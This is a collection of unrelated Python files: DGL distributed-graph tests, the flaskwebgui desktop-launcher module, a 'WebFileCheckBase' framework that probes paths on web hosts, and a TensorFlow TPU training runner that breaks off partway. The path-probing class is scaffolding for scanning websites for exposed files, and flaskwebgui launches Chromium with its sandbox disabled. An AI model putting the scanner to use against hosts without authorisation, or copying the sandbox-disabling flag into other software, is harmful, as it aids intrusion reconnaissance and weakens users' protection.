graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_emb_client, args=(graph_name, 0, num_servers, num_clients,
g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
assert p.exitcode == 0
for p in serv_ps:
p.join()
print('clients have terminated')
def check_server_client(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client, args=(graph_name, 0, num_servers, num_clients, g.number_of_nodes(),
g.number_of_edges()))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
def check_server_client_hierarchy(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_2'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph', num_trainers_per_machine=num_clients)
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
manager = mp.Manager()
return_dict = manager.dict()
node_mask = np.zeros((g.number_of_nodes(),), np.int32)
edge_mask = np.zeros((g.number_of_edges(),), np.int32)
nodes = np.random.choice(g.number_of_nodes(), g.number_of_nodes() // 10, replace=False)
edges = np.random.choice(g.number_of_edges(), g.number_of_edges() // 10, replace=False)
node_mask[nodes] = 1
edge_mask[edges] = 1
nodes = np.sort(nodes)
edges = np.sort(edges)
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_hierarchy, args=(graph_name, 0, num_servers,
node_mask, edge_mask, return_dict))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
nodes1 = []
edges1 = []
for n, e in return_dict.values():
nodes1.append(n)
edges1.append(e)
nodes1, _ = F.sort_1d(F.cat(nodes1, 0))
edges1, _ = F.sort_1d(F.cat(edges1, 0))
assert np.all(F.asnumpy(nodes1) == nodes)
assert np.all(F.asnumpy(edges1) == edges)
print('clients have terminated')
def run_client_hetero(graph_name, part_id, server_count, num_clients, num_nodes, num_edges):
time.sleep(5)
os.environ['DGL_NUM_SERVER'] = str(server_count)
dgl.distributed.initialize("kv_ip_config.txt")
gpb, graph_name, _, _ = load_partition_book('/tmp/dist_graph/{}.json'.format(graph_name),
part_id, None)
g = DistGraph(graph_name, gpb=gpb)
check_dist_graph_hetero(g, num_clients, num_nodes, num_edges)
def create_random_hetero():
num_nodes = {'n1': 10000, 'n2': 10010, 'n3': 10020}
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
edges = {}
for etype in etypes:
src_ntype, _, dst_ntype = etype
arr = spsp.random(num_nodes[src_ntype], num_nodes[dst_ntype], density=0.001, format='coo',
random_state=100)
edges[etype] = (arr.row, arr.col)
g = dgl.heterograph(edges, num_nodes)
g.nodes['n1'].data['feat'] = F.unsqueeze(F.arange(0, g.number_of_nodes('n1')), 1)
g.edges['r1'].data['feat'] = F.unsqueeze(F.arange(0, g.number_of_edges('r1')), 1)
return g
def check_dist_graph_hetero(g, num_clients, num_nodes, num_edges):
# Test API
for ntype in num_nodes:
assert ntype in g.ntypes
assert num_nodes[ntype] == g.number_of_nodes(ntype)
for etype in num_edges:
assert etype in g.etypes
assert num_edges[etype] == g.number_of_edges(etype)
etypes = [('n1', 'r1', 'n2'),
('n1', 'r2', 'n3'),
('n2', 'r3', 'n3')]
for i, etype in enumerate(g.canonical_etypes):
assert etype[0] == etypes[i][0]
assert etype[1] == etypes[i][1]
assert etype[2] == etypes[i][2]
assert g.number_of_nodes() == sum([num_nodes[ntype] for ntype in num_nodes])
assert g.number_of_edges() == sum([num_edges[etype] for etype in num_edges])
# Test reading node data
nids = F.arange(0, int(g.number_of_nodes('n1') / 2))
feats1 = g.nodes['n1'].data['feat'][nids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == nids))
# Test reading edge data
eids = F.arange(0, int(g.number_of_edges('r1') / 2))
feats1 = g.edges['r1'].data['feat'][eids]
feats = F.squeeze(feats1, 1)
assert np.all(F.asnumpy(feats == eids))
# Test init node data
new_shape = (g.number_of_nodes('n1'), 2)
g.nodes['n1'].data['test1'] = dgl.distributed.DistTensor(new_shape, F.int32)
feats = g.nodes['n1'].data['test1'][nids]
assert np.all(F.asnumpy(feats) == 0)
# create a tensor and destroy a tensor and create it again.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, 'test3', init_func=rand_init)
del test3
test3 = dgl.distributed.DistTensor((g.number_of_nodes('n1'), 3), F.float32, 'test3')
del test3
# add tests for anonymous distributed tensor.
test3 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
data = test3[0:10]
test4 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
del test3
test5 = dgl.distributed.DistTensor(new_shape, F.float32, init_func=rand_init)
assert np.sum(F.asnumpy(test5[0:10] != data)) > 0
# test a persistent tesnor
test4 = dgl.distributed.DistTensor(new_shape, F.float32, 'test4', init_func=rand_init,
persistent=True)
del test4
try:
test4 = dgl.distributed.DistTensor((g.number_of_nodes('n1'), 3), F.float32, 'test4')
raise Exception('')
except:
pass
# Test write data
new_feats = F.ones((len(nids), 2), F.int32, F.cpu())
g.nodes['n1'].data['test1'][nids] = new_feats
feats = g.nodes['n1'].data['test1'][nids]
assert np.all(F.asnumpy(feats) == 1)
# Test metadata operations.
assert len(g.nodes['n1'].data['feat']) == g.number_of_nodes('n1')
assert g.nodes['n1'].data['feat'].shape == (g.number_of_nodes('n1'), 1)
assert g.nodes['n1'].data['feat'].dtype == F.int64
selected_nodes = np.random.randint(0, 100, size=g.number_of_nodes('n1')) > 30
# Test node split
nodes = node_split(selected_nodes, g.get_partition_book(), ntype='n1')
nodes = F.asnumpy(nodes)
# We only have one partition, so the local nodes are basically all nodes in the graph.
local_nids = np.arange(g.number_of_nodes('n1'))
for n in nodes:
assert n in local_nids
print('end')
def check_server_client_hetero(shared_mem, num_servers, num_clients):
prepare_dist()
g = create_random_hetero()
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
# let's just test on one partition for now.
# We cannot run multiple servers and clients on the same machine.
serv_ps = []
ctx = mp.get_context('spawn')
for serv_id in range(num_servers):
p = ctx.Process(target=run_server, args=(graph_name, serv_id, num_servers,
num_clients, shared_mem))
serv_ps.append(p)
p.start()
cli_ps = []
num_nodes = {ntype: g.number_of_nodes(ntype) for ntype in g.ntypes}
num_edges = {etype: g.number_of_edges(etype) for etype in g.etypes}
for cli_id in range(num_clients):
print('start client', cli_id)
p = ctx.Process(target=run_client_hetero, args=(graph_name, 0, num_servers, num_clients, num_nodes,
num_edges))
p.start()
cli_ps.append(p)
for p in cli_ps:
p.join()
for p in serv_ps:
p.join()
print('clients have terminated')
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_server_client_hierarchy(False, 1, 4)
check_server_client_empty(True, 1, 1)
check_server_client_hetero(True, 1, 1)
check_server_client_hetero(False, 1, 1)
check_server_client(True, 1, 1)
check_server_client(False, 1, 1)
check_server_client(True, 2, 2)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support distributed DistEmbedding")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Mxnet doesn't support distributed DistEmbedding")
def test_dist_emb_server_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
check_dist_emb_server_client(True, 1, 1)
check_dist_emb_server_client(False, 1, 1)
check_dist_emb_server_client(True, 2, 2)
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support some of operations in DistGraph")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Turn off Mxnet support")
def test_standalone():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dgl.distributed.initialize("kv_ip_config.txt")
dist_g = DistGraph(graph_name, part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_graph(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
dgl.distributed.exit_client() # this is needed since there's two test here in one process
@unittest.skipIf(dgl.backend.backend_name == "tensorflow", reason="TF doesn't support distributed DistEmbedding")
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="Mxnet doesn't support distributed DistEmbedding")
def test_standalone_node_emb():
os.environ['DGL_DIST_MODE'] = 'standalone'
g = create_random_graph(10000)
# Partition the graph
num_parts = 1
graph_name = 'dist_graph_test_3'
g.ndata['features'] = F.unsqueeze(F.arange(0, g.number_of_nodes()), 1)
g.edata['features'] = F.unsqueeze(F.arange(0, g.number_of_edges()), 1)
partition_graph(g, graph_name, num_parts, '/tmp/dist_graph')
dgl.distributed.initialize("kv_ip_config.txt")
dist_g = DistGraph(graph_name, part_config='/tmp/dist_graph/{}.json'.format(graph_name))
check_dist_emb(dist_g, 1, g.number_of_nodes(), g.number_of_edges())
dgl.distributed.exit_client() # this is needed since there's two test here in one process
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_split():
#prepare_dist()
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
# The code now collects the roles of all client processes and use the information
# to determine how to split the workloads. Here is to simulate the multi-client
# use case.
def set_roles(num_clients):
dgl.distributed.role.CUR_ROLE = 'default'
dgl.distributed.role.GLOBAL_RANK = {i:i for i in range(num_clients)}
dgl.distributed.role.PER_ROLE_RANK['default'] = {i:i for i in range(num_clients)}
for i in range(num_parts):
set_roles(num_parts)
part_g, node_feats, edge_feats, gpb, _, _, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes1 = np.intersect1d(selected_nodes, F.asnumpy(local_nids))
nodes2 = node_split(node_mask, gpb, rank=i, force_even=False)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes2)))
local_nids = F.asnumpy(local_nids)
for n in nodes1:
assert n in local_nids
set_roles(num_parts * 2)
nodes3 = node_split(node_mask, gpb, rank=i * 2, force_even=False)
nodes4 = node_split(node_mask, gpb, rank=i * 2 + 1, force_even=False)
nodes5 = F.cat([nodes3, nodes4], 0)
assert np.all(np.sort(nodes1) == np.sort(F.asnumpy(nodes5)))
set_roles(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges1 = np.intersect1d(selected_edges, F.asnumpy(local_eids))
edges2 = edge_split(edge_mask, gpb, rank=i, force_even=False)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges2)))
local_eids = F.asnumpy(local_eids)
for e in edges1:
assert e in local_eids
set_roles(num_parts * 2)
edges3 = edge_split(edge_mask, gpb, rank=i * 2, force_even=False)
edges4 = edge_split(edge_mask, gpb, rank=i * 2 + 1, force_even=False)
edges5 = F.cat([edges3, edges4], 0)
assert np.all(np.sort(edges1) == np.sort(F.asnumpy(edges5)))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_split_even():
#prepare_dist(1)
g = create_random_graph(10000)
num_parts = 4
num_hops = 2
partition_graph(g, 'dist_graph_test', num_parts, '/tmp/dist_graph', num_hops=num_hops, part_method='metis')
node_mask = np.random.randint(0, 100, size=g.number_of_nodes()) > 30
edge_mask = np.random.randint(0, 100, size=g.number_of_edges()) > 30
selected_nodes = np.nonzero(node_mask)[0]
selected_edges = np.nonzero(edge_mask)[0]
all_nodes1 = []
all_nodes2 = []
all_edges1 = []
all_edges2 = []
# The code now collects the roles of all client processes and use the information
# to determine how to split the workloads. Here is to simulate the multi-client
# use case.
def set_roles(num_clients):
dgl.distributed.role.CUR_ROLE = 'default'
dgl.distributed.role.GLOBAL_RANK = {i:i for i in range(num_clients)}
dgl.distributed.role.PER_ROLE_RANK['default'] = {i:i for i in range(num_clients)}
for i in range(num_parts):
set_roles(num_parts)
part_g, node_feats, edge_feats, gpb, _, _, _ = load_partition('/tmp/dist_graph/dist_graph_test.json', i)
local_nids = F.nonzero_1d(part_g.ndata['inner_node'])
local_nids = F.gather_row(part_g.ndata[dgl.NID], local_nids)
nodes = node_split(node_mask, gpb, rank=i, force_even=True)
all_nodes1.append(nodes)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(local_nids))
print('part {} get {} nodes and {} are in the partition'.format(i, len(nodes), len(subset)))
set_roles(num_parts * 2)
nodes1 = node_split(node_mask, gpb, rank=i * 2, force_even=True)
nodes2 = node_split(node_mask, gpb, rank=i * 2 + 1, force_even=True)
nodes3, _ = F.sort_1d(F.cat([nodes1, nodes2], 0))
all_nodes2.append(nodes3)
subset = np.intersect1d(F.asnumpy(nodes), F.asnumpy(nodes3))
print('intersection has', len(subset))
set_roles(num_parts)
local_eids = F.nonzero_1d(part_g.edata['inner_edge'])
local_eids = F.gather_row(part_g.edata[dgl.EID], local_eids)
edges = edge_split(edge_mask, gpb, rank=i, force_even=True)
all_edges1.append(edges)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(local_eids))
print('part {} get {} edges and {} are in the partition'.format(i, len(edges), len(subset)))
set_roles(num_parts * 2)
edges1 = edge_split(edge_mask, gpb, rank=i * 2, force_even=True)
edges2 = edge_split(edge_mask, gpb, rank=i * 2 + 1, force_even=True)
edges3, _ = F.sort_1d(F.cat([edges1, edges2], 0))
all_edges2.append(edges3)
subset = np.intersect1d(F.asnumpy(edges), F.asnumpy(edges3))
print('intersection has', len(subset))
all_nodes1 = F.cat(all_nodes1, 0)
all_edges1 = F.cat(all_edges1, 0)
all_nodes2 = F.cat(all_nodes2, 0)
all_edges2 = F.cat(all_edges2, 0)
all_nodes = np.nonzero(node_mask)[0]
all_edges = np.nonzero(edge_mask)[0]
assert np.all(all_nodes == F.asnumpy(all_nodes1))
assert np.all(all_edges == F.asnumpy(all_edges1))
assert np.all(all_nodes == F.asnumpy(all_nodes2))
assert np.all(all_edges == F.asnumpy(all_edges2))
def prepare_dist():
ip_config = open("kv_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('{}\n'.format(ip_addr))
ip_config.close()
if __name__ == '__main__':
os.makedirs('/tmp/dist_graph', exist_ok=True)
test_dist_emb_server_client()
test_server_client()
test_split()
test_split_even()
test_standalone()
test_standalone_node_emb()
|
flaskwebgui.py
|
__version__ = "0.3.0"
import os
import sys
import time
from datetime import datetime
import logging
import tempfile
import socketserver
import subprocess as sps
from inspect import isfunction
from threading import Lock, Thread
logging.basicConfig(level=logging.INFO, format='flaskwebgui - [%(levelname)s] - %(message)s')
# UTILS
def find_chrome_mac():
default_dir = r'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome'
if os.path.exists(default_dir):
return default_dir
# use mdfind ci to locate Chrome in alternate locations and return the first one
name = 'Google Chrome.app'
alternate_dirs = [x for x in sps.check_output(["mdfind", name]).decode().split('\n') if x.endswith(name)]
if len(alternate_dirs):
return alternate_dirs[0] + '/Contents/MacOS/Google Chrome'
return None
def find_chrome_linux():
try:
import whichcraft as wch
except Exception as e:
raise Exception("whichcraft module is not installed/found \
please fill browser_path parameter or install whichcraft!") from e
chrome_names = ['chromium-browser',
'chromium',
'google-chrome',
'google-chrome-stable']
for name in chrome_names:
chrome = wch.which(name)
if chrome is not None:
return chrome
return None
def find_chrome_win():
#using edge by default since it's build on chromium
edge_path = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
if os.path.exists(edge_path):
return edge_path
import winreg as reg
reg_path = r'SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe'
chrome_path = None
last_exception = None
for install_type in reg.HKEY_CURRENT_USER, reg.HKEY_LOCAL_MACHINE:
try:
reg_key = reg.OpenKey(install_type, reg_path, 0, reg.KEY_READ)
chrome_path = reg.QueryValue(reg_key, None)
reg_key.Close()
except WindowsError as e:
last_exception = e
else:
if chrome_path and len(chrome_path) > 0:
break
# Only log some debug info if we failed completely to find chrome
if not chrome_path:
logging.exception(last_exception)
logging.error("Failed to detect chrome location from registry")
else:
logging.info(f"Chrome path detected as: {chrome_path}")
return chrome_path
def get_default_chrome_path():
"""
Credits for get_instance_path, find_chrome_mac, find_chrome_linux, find_chrome_win funcs
got from: https://github.com/ChrisKnott/Eel/blob/master/eel/chrome.py
"""
if sys.platform in ['win32', 'win64']:
return find_chrome_win()
elif sys.platform in ['darwin']:
return find_chrome_mac()
elif sys.platform.startswith('linux'):
return find_chrome_linux()
# class FlaskwebguiDjangoMiddleware:
# def __init__(self, get_response=None):
# self.get_response = get_response
# def __call__(self, request):
# response = self.get_response(request)
# return response
current_timestamp = None
class FlaskUI:
def __init__(self,
app,
start_server='flask',
width=800,
height=600,
maximized=False,
fullscreen=False,
browser_path=None,
socketio=None,
on_exit=None,
idle_interval=5
) -> None:
self.app = app
self.start_server = str(start_server).lower()
self.width = str(width)
self.height= str(height)
self.fullscreen = fullscreen
self.maximized = maximized
self.browser_path = browser_path if browser_path else get_default_chrome_path()
self.socketio = socketio
self.on_exit = on_exit
self.idle_interval = idle_interval
self.set_url()
self.webserver_dispacher = {
"flask": self.start_flask,
"flask-socketio": self.start_flask_socketio,
"django": self.start_django,
"fastapi": self.start_fastapi
}
self.supported_frameworks = list(self.webserver_dispacher.keys())
self.lock = Lock()
def update_timestamp(self):
self.lock.acquire()
global current_timestamp
current_timestamp = datetime.now()
self.lock.release()
def run(self):
"""
Starts 3 threads one for webframework server and one for browser gui
"""
self.update_timestamp()
t_start_webserver = Thread(target=self.start_webserver)
t_open_chromium = Thread(target=self.open_chromium)
t_stop_webserver = Thread(target=self.stop_webserver)
threads = [t_start_webserver, t_open_chromium, t_stop_webserver]
for t in threads: t.start()
for t in threads: t.join()
def set_url(self):
with socketserver.TCPServer(("localhost", 0), None) as s:
free_port = s.server_address[1]
self.host = '127.0.0.1'
self.port = free_port
self.localhost = f"http://{self.host}:{self.port}"
def start_webserver(self):
if isfunction(self.start_server):
self.start_server()
if self.start_server not in self.supported_frameworks:
raise Exception(f"'start_server'({self.start_server}) not in {','.join(self.supported_frameworks)} and also not a function which starts the webframework")
self.webserver_dispacher[self.start_server]()
def add_flask_middleware(self):
@self.app.after_request
def keep_alive_after_request(response):
self.keep_server_running()
return response
def start_flask(self):
self.add_flask_middleware()
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
except:
self.app.run(host=self.host, port=self.port)
def start_flask_socketio(self):
self.add_flask_middleware()
self.socketio.run(self.app, host=self.host, port=self.port)
def start_django(self):
try:
import waitress
waitress.serve(self.app, host=self.host, port=self.port)
except:
try:#linux and mac
os.system(f"python3 manage.py runserver {self.port}")
except:#windows
os.system(f"python manage.py runserver {self.port}")
def add_fastapi_middleware(self):
@self.app.middleware("http")
async def keep_alive_after_request(request, call_next):
response = await call_next(request)
self.keep_server_running()
return response
def start_fastapi(self):
import uvicorn
self.add_fastapi_middleware()
uvicorn.run(self.app, host=self.host, port=self.port, log_level="warning")
def open_chromium(self):
"""
Open the browser selected (by default it looks for chrome)
# https://peter.sh/experiments/chromium-command-line-switches/
"""
logging.info(f"Opening browser at {self.localhost}")
temp_profile_dir = os.path.join(tempfile.gettempdir(), "flaskwebgui")
if self.browser_path:
launch_options = None
if self.fullscreen:
launch_options = ["--start-fullscreen"]
elif self.maximized:
launch_options = ["--start-maximized"]
else:
launch_options = [f"--window-size={self.width},{self.height}"]
options = [
self.browser_path,
f"--user-data-dir={temp_profile_dir}",
"--new-window",
"--no-sandbox",
"--no-first-run",
# "--window-position=0,0"
] + launch_options + [f'--app={self.localhost}']
sps.Popen(options, stdout=sps.PIPE, stderr=sps.PIPE, stdin=sps.PIPE)
else:
import webbrowser
webbrowser.open_new(self.localhost)
def stop_webserver(self):
#TODO add middleware for Django
if self.start_server == 'django':
logging.info("Middleware not implemented (yet) for Django.")
return
while True:
self.lock.acquire()
global current_timestamp
delta_seconds = (datetime.now() - current_timestamp).total_seconds()
self.lock.release()
if delta_seconds > self.idle_interval:
logging.info("App closed")
break
time.sleep(self.idle_interval)
if isfunction(self.on_exit):
logging.info(f"Executing {self.on_exit.__name__} function...")
self.on_exit()
logging.info("Closing connections...")
os.kill(os.getpid(), 9)
def keep_server_running(self):
self.update_timestamp()
return "Ok"
|
WebFileCheckBase.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env/ python3
"""
WebFile检查基础框架
Author: Rookie
E-mail: hyll8882019@outlook.com
"""
from collections import deque
from threading import Thread
from RookieTools.logger import logger
from RookieTools.ip import is_special_ip
from RookieTools.common import downloader
from RookieTools.CheckBase import CheckBase, abstractmethod
class WebFileCheckBase(CheckBase):
PluginName = None
ThreadNumber = 10
DEBUG = False
GetOneResult = False
def __init__(self, url):
self.url = url
self.tasks = deque()
self.result = []
super(WebFileCheckBase, self).__init__()
@abstractmethod
def tasks_init(self):
pass
def init_check(self) -> bool:
resp = downloader(self.url, stream=True, output_error=self.DEBUG)
if resp is None:
return False
try:
return not is_special_ip(resp.raw._connection.sock.getpeername()[0])
except AttributeError:
pass
except Exception as e:
logger.exception(e)
return False
finally:
resp.close()
@abstractmethod
def check(self, path):
pass
def work_in(self):
while True:
try:
path = self.tasks.popleft()
except IndexError:
break
if self.check(path) and self.result:
with self.file_lock:
self.pipe(self.result)
if self.GetOneResult:
self.clean_tasks()
def run(self):
status = self.init_check()
logger.info('% -40s %s %s' % (self.url, self.PluginName, '初始化检查正常' if status else '初始化检查不正常'))
if status:
self.tasks_init()
thds = [Thread(target=self.work_in) for _ in range(self.ThreadNumber)]
[thd.start() for thd in thds]
[thd.join() for thd in thds]
@abstractmethod
def pipe(self, result):
pass
def clean_tasks(self):
with self.task_lock:
if len(self.tasks):
logger.info('% -40s正在清空任务队列. 请稍后....' % self.url)
self.tasks.clear()
|
train_and_eval_runner.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Bypass TPUEstimator for ResNet-50 Train."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import os
import threading
import time
from absl import flags
from six.moves import queue as Queue
import tensorflow as tf
from tensorflow.contrib import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_function
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.framework import graph_io
from mlp_log import mlp_log
FLAGS = flags.FLAGS
_INITIAL_LOSS = 1e7
_STOP = -1
# Decorator function for tpu computation func that was passed to tpu.rewrite()
# if there are embedded train and eval loops in this func, trace tools will
# generate step markers for each iteration.
def on_device_train_and_eval_loops(func):
# Value for this attribute is from xla.DebugOptions.StepMarkerLocation.
setattr(func, "step_marker_location", "STEP_MARK_AT_SECOND_LEVEL_WHILE_LOOP")
return func
def device_for_tpu_core(host_name, core=0):
return host_name + "/device:TPU_REPLICATED_CORE:%d" % core
def device_for_host(host_name):
return host_name + "/device:CPU:0"
def wrap_computation_in_while_loop(op_fn, n, host_name, parallel_iterations=1):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
ops = op_fn()
if not isinstance(ops, list):
ops = [ops]
with tf.control_dependencies(ops):
return i + 1
with tf.device(device_for_host(host_name)):
return tf.while_loop(
lambda i: tf.less(i, n),
computation, [tf.constant(0)],
parallel_iterations=parallel_iterations)
def tpu_ordinal_fn(shard_index_in_host):
"""Return the TPU ordinal associated with a shard.
Required because the enqueue ops are placed on CPU.
Args:
shard_index_in_host: the shard index
Returns:
The ordinal of the TPU device the shard's infeed should be placed on.
"""
return shard_index_in_host % FLAGS.tpu_cores_per_host
def _profiler_callback(comment, session_id):
if session_id is None:
tf.logging.info("Profiling failed for %s", comment)
else:
tf.logging.info("Profiling succeeded for %s. Overview page url:", comment)
class TrainAndEvalRunner(object):
"""Remove init overheads in TPU Estimator via direct session.run calls."""
def __init__(self, iterations, train_steps, eval_steps):
tf.logging.info("TrainAndEvalRunner: constructor")
self.feature_structure = {}
self.eval_feature_structure = {}
self.loss = None
self.eval_loss = None
self.infeed_queue = []
self.eval_infeed_queue = []
self.enqueue_ops = []
self.num_hosts = FLAGS.num_cores // FLAGS.tpu_cores_per_host
self.dequeue_ops = []
self.queue = Queue.Queue()
self.eval_enqueue_ops = []
self.dataset_initializer = []
self.eval_dataset_initializer = []
self.iterations = iterations
self.steps_per_epoch = FLAGS.num_train_images // FLAGS.train_batch_size
self.iterator = None
self.sess = None
self.input_sess = None
self.eval_input_sess = None
self.eval_output_sess = None
self.infeed_thread = None
self.train_eval_thread = None
self.graph = tf.Graph()
self.input_graph = tf.Graph()
self.eval_input_graph = tf.Graph()
self.eval_output_graph = tf.Graph()
if train_steps % iterations != 0:
train_steps = iterations * int(math.ceil(train_steps / iterations))
self.train_steps = train_steps
self.max_train_iterations = self.train_steps // iterations
self.eval_steps = int(eval_steps)
self.eval_batch_size = FLAGS.eval_batch_size
tpu_init = [tpu.initialize_system()]
self.tpu_shutdown = tpu.shutdown_system()
self.tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu or FLAGS.master,
zone=FLAGS.tpu_zone,
project=FLAGS.gcp_project)
self.config = tf.ConfigProto(
operation_timeout_in_ms=600 * 60 * 1000,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)),
isolate_session_state=True)
cluster_spec = self.tpu_cluster_resolver.cluster_spec()
if cluster_spec:
self.config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
self.master = self.tpu_cluster_resolver.get_master()
self.init_sess = tf.Session(self.master, config=self.config)
self.init_sess.run(tpu_init)
def get_host(self, host_id):
if self.master in ("", "local"):
return "/replica:0/task:0"
job_name = self.tpu_cluster_resolver.get_job_name() or "tpu_worker"
return "/job:%s/task:%d" % (job_name, host_id)
def build_enqueue_ops(self, input_fn, params, host_id, is_training=True):
"""Build enqueue operations for the input pipeline in a given host.
Args:
input_fn: dataset input graph generation function
params: input function parameters
host_id: host identifier
is_training: boolean indicates if it is training
"""
iparams = {}
iparams["batch_size"] = params["batch_size"] // FLAGS.num_cores
iparams["dataset_num_shards"] = self.num_hosts
def get_enqueue_ops_fn():
"""Generate the enqueue ops graph function."""
iparams["dataset_index"] = host_id
with tf.device(device_for_host(self.get_host(host_id))):
dataset = input_fn(iparams)
if not is_training:
dataset = dataset.cache()
dataset = dataset.repeat()
iterator = dataset.make_initializable_iterator()
if is_training:
self.dataset_initializer.append(iterator.initializer)
else:
self.eval_dataset_initializer.append(iterator.initializer)
def enqueue_ops_fn():
"""Generate the infeed enqueue ops graph."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(FLAGS.tpu_cores_per_host):
with tf.control_dependencies(control_deps):
features, labels = iterator.get_next()
if is_training:
self.feature_structure["features"] = features
self.feature_structure["labels"] = labels
flattened_inputs = data_nest.flatten(self.feature_structure)
else:
self.eval_feature_structure["features"] = features
